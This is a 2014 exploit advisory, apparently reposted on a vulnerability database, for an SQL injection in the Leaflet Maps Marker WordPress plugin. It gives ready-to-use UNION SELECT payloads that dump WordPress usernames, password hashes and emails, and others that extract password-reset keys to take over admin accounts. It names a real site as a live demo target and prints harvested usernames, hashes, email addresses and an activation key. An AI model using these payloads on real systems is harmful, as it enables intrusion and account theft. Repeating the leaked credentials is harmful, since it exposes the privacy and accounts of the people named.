WordPress leaflet maps marker plugin SQL Injection Vulnerability

2014.05.02
Credit: neo.hapsis
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

######################################## # Exploit Title: WordPress leaflet maps marker plugin SQL Injection Vulnerability # # Author: neo.hapsis #member og Hackyard Security Group # E-mail: neo.hapsis[dot]hackyard.net / internet.security[dot]vodafone.it # # Web Site : neohapsis.com | # # Category:: webapps # # Google Dork: NA # # platform : php # # Vendor: http://www.mapsmarker.com/ # # Version: 1.x.x # # Tested on: linux # # Security Risk : High # ######################################## 1)Introduction 2)Vulnerability Description 3)Exploit 1)Introduction The WordPress plugin Leaflet Maps Marker allows you to pin, organize & show your favorite places through OpenStreetMap on your blog and via different APIs on external websites or apps 2)Vulnerability Description U can inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else. 3)Exploit [~] P0c [~] : ================================================================= Vuln file in : http://Localhost/{Path}/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php [~] Vuln Code [~] : ----------------------------------------------------------------------------------------------------------------------------------- elseif (isset($_GET['marker'])) { $markerid = mysql_real_escape_string($_GET['marker']); $uid = substr(md5(.rand()), 0, 8); $pname = pa.$uid; $table_name_markers = $wpdb->prefix.leafletmapsmarker_markers; $row = $wpdb->get_row(SELECT id,markername,basemap,layer,lat,lon,icon,popuptext,zoom, openpopup,mapwidth,mapwidthunit,mapheight,panel,controlbox,overlays_custom,overlays_custom2, overlays_custom3,overlays_custom4,wms,wms2,wms3,wms4,wms5,wms6,wms7,wms8,wms9,wms10 FROM .$table_name_markers. WHERE id=.$markerid, ARRAY_A); if(!empty($row)) { [~] D3m0 [~] : http://www.site.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=1 [Inj3ct Here] Code: Union Select 1,(select(@) from (select (@:=000),(select (@) from (wp_users) where (@) in (@:=concat (@,0x0a,user_login,0x3a,user_pass,0x3a,user_email))))a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28,29 GREATFULL TRICKY On extraction user_activation_key by injection that we will use to new password Now this password is difficult the password of wordpress crack it Easy way to login into the admin panel First we going to admin panel and press / Lost your password? \ now we will put the admin user we found by injection and reset the password and get the activation key. Activation key stored in the sqldatabase in table wp_users on column user_activation_key Now extract the user_login and user_activation_key COde: http://www.site.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=-1 UNION SELECT 1,2,3,4, 5,group_concat(user_login,0x3a,user_activation_key),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29 FROM wp_users Now replace to extracted date http://www.site.com/wp-login.php?action=rp&key=user_activation_key&login=user_login And set the new password! Demo on injection http://brighterdayproject.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=-1 Union Select 1,(select(@) from (select (@:=000),(select (@) from (wp_users) where (@) in (@:=concat (@,0x0a,user_login,0x3a,user_pass,0x3a,user_email))))a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,27,28,29 View in source page JayM80:$P$BQGIrXW2vvfVmRZYbvt6IN56MenEAx/:jay@jasonlarche.com MigerIo3:$P$BvEmL2ZeNTzllduuqR2HkhPmQeQfuX0:pongokongo@gmail.com Using sqlinjection for extracting date on http://brighterdayproject.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=-1 UNION SELECT 1,2,3,4,5,group_concat(user_login,0x3a,user_activation_key),7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29 FROM wp_users On surce whe can seen JayM80:EHn9LQ7oZ3dhHUwuf63D creat the login sintax with activation key when extracted on table_name=users wp-login.php?action=rp&key=EHn9LQ7oZ3dhHUwuf63D&login=JayM80 By Neo.hapsis !

References:

http://www.mapsmarker.com/


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top